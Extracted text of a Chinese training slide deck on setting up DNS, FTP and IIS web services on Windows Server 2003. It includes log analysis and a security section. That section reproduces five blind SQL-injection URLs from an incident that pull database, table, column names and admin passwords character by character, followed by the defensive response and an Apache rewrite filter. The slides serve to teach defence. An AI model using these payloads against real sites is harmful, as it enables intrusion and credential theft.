在windows上搭建web站點(diǎn)

在windows上搭建web站點(diǎn)wp1998@

2011.7編輯pptWeb站點(diǎn)的基本概念網(wǎng)絡(luò)服務(wù)DNS、FTP、webserver、Database……網(wǎng)站安全操作系統(tǒng)、web服務(wù)、數(shù)據(jù)庫(kù)、應(yīng)用腳本……訪問(wèn)質(zhì)量web訪問(wèn)速度、服務(wù)在線率……編輯ppt一個(gè)基本完整的web站點(diǎn)WebAPPserverDNSserverFTPserverDatabaseserverMailserverWindow2003serverLinuxserverASP/PHP/JSP/ASP.netWeb站點(diǎn)：DNS解析域名FTP上傳文件CPU/memoryFileIO質(zhì)量安全編輯ppt建立DNS服務(wù)DNS的基本原理什么是dns、解析原理在Windows上建立dns服務(wù)Windowsserver自帶的dns服務(wù)操作查詢和驗(yàn)證dnsNslookup、dig編輯pptDNS的基本原理DomainNameServer域名服務(wù)提供域名與IP的對(duì)應(yīng)關(guān)系->9由dns服務(wù)器提供分級(jí)查詢服務(wù)

INNS->WindowsDNSserver與bind編輯pptDNS的基本原理NS：NS：NS：S編輯ppt在windows2003s上建立dns服務(wù)編輯ppt查詢和驗(yàn)證DNS服務(wù)Nslookup用來(lái)查詢域名信息的工具nslookupServersettype=mxDig更加靈活和強(qiáng)大的dns查詢工具Dig@mxDig@mx

+trace編輯ppt建立ftp服務(wù)ftp傳輸簡(jiǎn)介使用Window上自帶的ftp服務(wù)使用開(kāi)源的FileZilla建立ftp服務(wù)編輯pptFTP服務(wù)簡(jiǎn)介FileTransferProtocol是用來(lái)文件傳輸?shù)囊环N標(biāo)準(zhǔn)協(xié)議使用TCP21和TCP20端口，21端口用于傳輸命令控制，20端口用于數(shù)據(jù)傳輸。主動(dòng)模式和被動(dòng)模式斷點(diǎn)續(xù)傳開(kāi)源ftp工具：FileZilla編輯ppt使用windows2003s自帶的ftp服務(wù)編輯ppt使用Filezillaserver建立ftp服務(wù)編輯ppt建立web服務(wù)Web服務(wù)器的原理利用IIS建立web服務(wù)web發(fā)布、支持動(dòng)態(tài)腳本（asp、php、）利用IIS實(shí)現(xiàn)虛擬主機(jī)虛擬主機(jī)Web日志的利用和分析webalizer、awstat編輯pptweb服務(wù)器的基本原理編輯ppt在windows2003s上安裝IIS編輯ppt利用IIS發(fā)布一個(gè)網(wǎng)站編輯ppt讓IIS支持php動(dòng)態(tài)腳本編輯ppt在一臺(tái)IIS上建立多個(gè)虛擬站點(diǎn)編輯pptIIS站點(diǎn)web日志的管理與分析為每個(gè)站點(diǎn)保存獨(dú)立的web日志每天一個(gè)日志獨(dú)立目錄，定期檢查web日志分析webalizer/awstat自動(dòng)生成分析報(bào)表編輯ppt在windows上自動(dòng)分析weblog安裝webalizerdownload/編輯配置文件webalizer.conf建立批處理文件分析日志@ECHOOFFsetnow=%date:~0,4%%date:~5,2%%date:~8,2%CALLC:\webalizer\webalizer.exeD:\logs\access_%now%.log加入自動(dòng)計(jì)劃編輯pptWeb站點(diǎn)安全Windows系統(tǒng)安全I(xiàn)IS的安全腳本安全問(wèn)題Sql-inject、XSS跨站攻擊數(shù)據(jù)備份編輯pptIIS的安全工具M(jìn)icrosoft官方提供的Urlscan/download/urlscan屏蔽不合理的web請(qǐng)求減輕sql-inject攻擊記錄符合規(guī)則的攻擊日志每個(gè)web站點(diǎn)和目錄使用獨(dú)立的用戶帳號(hào)不使用不安全的IIS組件編輯ppt一次sql-inject的過(guò)程more.php?id=1and(selectascii(substr(database(),2,1))

)<=256and1=1

第一步，它通過(guò)selectdatabase()來(lái)一個(gè)個(gè)獲取數(shù)據(jù)庫(kù)名中的字符，因?yàn)槲覀償?shù)據(jù)庫(kù)名是4個(gè)字符，很快可以得到。more.php?id=1and(selectlength(cast(count(*)aschar))frominformation_schema.columns

wheretable_name=0x61646d696eandtable_schema=0×63737879limit1)<=32and1=1

第二步，通過(guò)獲得的數(shù)據(jù)庫(kù)名，在得到表名之后（也是利用前一步方式）獲取admin表的字段數(shù)量

more.php?id=1and(selectascii(substr(column_name,1,1))from(select*from(select*frominformation_schema.columnswheretable_name=0x61646d696eandtable_schema=0×63737879orderby1limit0,1)torderby1desc)tlimit1)>108and1=1

第三步，通過(guò)數(shù)據(jù)庫(kù)和表名在mysql系統(tǒng)表里探測(cè)字段名稱more.php?id=1and(selectascii(substr(user_pwd,3,1))from(select*from(select*fromadminwhere1=1orderby1limit2,1)torderby1desc)tlimit1)>56and1=1

第四步，得到了字段名user_pwd后，仍用每字符ascii嗎的方式探測(cè)字段內(nèi)容more.php?id=1and(selectascii(substr(user_name,4,1))from(select*from(select*fromadminwhere1=1orderby1limit2,1)torderby1desc)tlimit1)>128and1=1

第五步，同上，探測(cè)user_name的字段內(nèi)容通過(guò)上面的幾個(gè)步驟基本可以拿到應(yīng)用程序中的賬號(hào)密碼，然后試圖進(jìn)入管理界面后通過(guò)uploadshell等方式進(jìn)一步得到系統(tǒng)權(quán)限。編輯ppt一次sql-inject的實(shí)際處理處理過(guò)程:1、分析web日志，根據(jù)被修改頁(yè)面URL追查入侵路徑2、鎖定存在sql-inject漏洞的腳本，向開(kāi)發(fā)人員提出修改意見(jiàn)3、在腳本中加強(qiáng)Get變量驗(yàn)證函數(shù)，過(guò)濾非法變量?jī)?nèi)容；3、在webserver上添加rewrite規(guī)則，過(guò)濾特殊sql-inject字符的URL訪問(wèn)4、文件存檔、安全報(bào)告。我們?cè)贏pache中做的一些簡(jiǎn)單rewrite設(shè)置：RewriteEngineOn

RewriteBase/

RewriteCond%{QUERY_STRING}%20and%20[NC]

RewriteCond%{QUERY_STRING}select%20[NC]

RewriteRule^(.*)/519.html[R]URL變量中包含and和select的請(qǐng)求，全部定向到錯(cuò)誤提示頁(yè)面。編